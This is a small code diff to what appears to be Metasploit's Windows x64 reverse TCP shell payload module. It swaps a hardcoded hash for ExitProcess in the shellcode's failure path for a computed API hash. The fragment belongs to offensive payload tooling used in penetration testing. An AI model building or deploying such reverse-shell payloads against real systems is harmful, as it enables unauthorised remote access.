@@ -173,7 +173,7 @@ module Payload::Windows::ReverseTcp_x64
     else
       asm << %Q^
       failure:
-        push 0x56A2B5F0       ; hardcoded to exitprocess for size
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
         call rbp
       ^
     end
